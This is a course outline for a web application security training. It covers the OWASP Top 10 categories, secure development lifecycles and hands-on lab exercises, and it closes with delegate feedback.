Highlights
- Understanding Web Applications
- Information Security & Cybersecurity Fundamentals
- Remediating Common Web Application Vulnerabilities
- Introducing WebAppSec Good Practices
- Secure Web App Development Lifecycles & Supporting Tools
- A04 Insecure Design & A02 Cryptographic Failures
- A03 Injection & A10 Server-Side Request Forgery
- A07 ID & Authentication Failures & A01 Broken Access Control
- A05 Security Misconfiguration & A06 Outdated Components
- A08 Integrity Failures & A09 Logging & Monitoring Failures
- Supporting continuous Web Application Security improvements
Course Details
Module 1: Introductions, course overview & starting surveys
- targeted WebAppSec quizzes with instant feedback to activate delegates’ learning
- connecting to & getting familiar with the course’s hands-on Linux lab environment
- previews of Day 1 & Day 2 content to prepare delegates to engage with WebAppSec
Practicals: each delegate will access an individual cloud-hosted Linux VM via RDP or HTTPS
Module 2: Understanding Web Applications
- exploring HTML, Cascading Style Sheets & JavaScript using Modern Web Browsers
- understanding legal, ethical & data protection considerations related to WebAppSec
- inspecting HTTP verbs, Headers, Cookies & data using ZED Attack Proxy (ZAP)
Practicals: delegates will perform all of this module’s activities in their Linux VM labs
Module 3: Information Security & Cybersecurity Fundamentals
- appreciating the significance of availability, confidentiality & integrity for Web Apps
- performing simulated phishing attacks using SE Toolkit & BEEF Project
- understanding the meaning of threats, vulnerabilities, exploits, incidents & controls
Practicals: delegates will perform the simulated phishing activities in their Linux VM labs
Module 4: Remediating Common Web Application Vulnerabilities
- identifying & remediating the “Click Jacking” (missing X-OPTIONS-HEADER) weakness
- identifying & remediating the Cross-Site Request Forgery (XSRF) vulnerability
- Securing Cookies with HttpOnly & Secure Flags
Practicals: delegates will perform all of this module’s activities in their Linux VM labs
Module 5: Introducing WebAppSec Good Practices
- introducing OWASP & the OWASP Top 10 Web Application Threat model
- performing Threat Modelling of a Web Application using STRIDE
- understanding relationships between OWASP, CWEs, CVEs, CVSS & MITRE ATT&CK
Practicals: important Threat Modelling group practicals will not rely on the Linux VM labs
Module 6: Secure Web App Development Lifecycles & Supporting Tools
- reviewing 4 leading SSDLC models: Microsoft SDL, OpenSAMM, BSIMM, SafeCode
- understanding the value of OWASP’s Application Security Verification Standard (ASVS)
- considering how IAST tools (like ZAP & Burp Suite) differ from SAST & DAST tools
Practicals: SSDLC activities not Lab-based but Linux VM labs will be used for ZAP & BurpSuite
Module 7: A04 Insecure Design & A02 Cryptographic Failures
- reinforcing need for Threat Model driven WebAppSec lifecycle (as per Modules 5 & 6)
- breaking TLS security by installing untrusted Root Certificates in Firefox lab environment
- understanding the WebAppSec design challenges of secure cryptographic key management
Practicals: delegates will perform cryptographic security activities in their Linux VM labs
Module 8: A03 Injection & A10 Server-Side Request Forgery
- appreciating how injection attacks occur from poor data/code separation & input validation
- experiencing the significance of Cross-Site Scripting (XSS) attacks with hands-on examples
- how to identify & mitigate SQL Injection & SSRF vulnerabilities
Practicals: delegates will perform XSS, SQL Injection & SSRF activities in their Linux VM labs
Module 9: A07 ID & Authentication Failures & A01 Broken Access Control
- understanding the nature of Identification, Authentication & Access Control
- performing attacks on authentication using spoofing, cookie stealing & hash cracking
- how to design secure Web Apps based on proven Identity & Access Control methods
Practicals: delegates will perform authentication attack activities in their Linux VM labs
Module 10: A05 Security Misconfiguration & A06 Outdated Components
- using legal Open Source Intelligence (OSINT) methods to identify exposed vulnerabilities
- showing how DNS, Shodan & Certificate Transparency records can expose internal assets
- exploring good practices for hardening & patching Web Applications
Practicals: OSINT activities may be performed either using Linux VM labs or own computer
Module 11: A08 Integrity Failures & A09 Logging & Monitoring Failures
- examining the meaning & impacts of software integrity failures
- performing simulated attack using malicious file upload & insecure de-serialisation
- understanding the causes & impacts of the Log4J vulnerability
Practicals: delegates will Log4J & Syslog monitoring activities in their Linux VM
Module 12: Supporting continuous Web Application Security improvements
- reflecting on learnings from this course & how to improve WebAppSec within the BBC
- signposting trusted sources of further relevant information about WebAppSec
- completing end-of-course feedback to improve future runs of this course
Practicals: delegates will access online surveys & quizzes to reinforce their learning
Resources:
• Cloud Hosted Ubuntu Linux Virtual Machines – 1 per delegate (up to 10 delegates)
• Selected Kali Linux tools e.g. SE Toolkit, HashCat, BEEF Project, ZAP Proxy
• Selected elements of vulnerable apps e.g. OWASP Juice Shop, DVWA, Google XSS-Game & Gruyere.
• Selected Websites & OSINT sources e.g. OWASP, MITRE, NIST CVE, FIRST CVSS, SafeCode, Shodan
Who should attend
Feedback
4.8 out of 5 average
" We tried to cover a lot of bases here from people who had no experience of SQL injection to people who had very specific questions and Tim balanced that really well in the timeframe." RK, Developer, Secure Web Development, Dec 2022
“JBI did a great job of customizing their syllabus to suit our business needs and also bringing our team up to speed on the current best practices. Our teams varied widely in terms of experience and the Instructor handled this particularly well - very impressive”
Brian F, Team Lead, RBS, Data Analysis Course, April 2022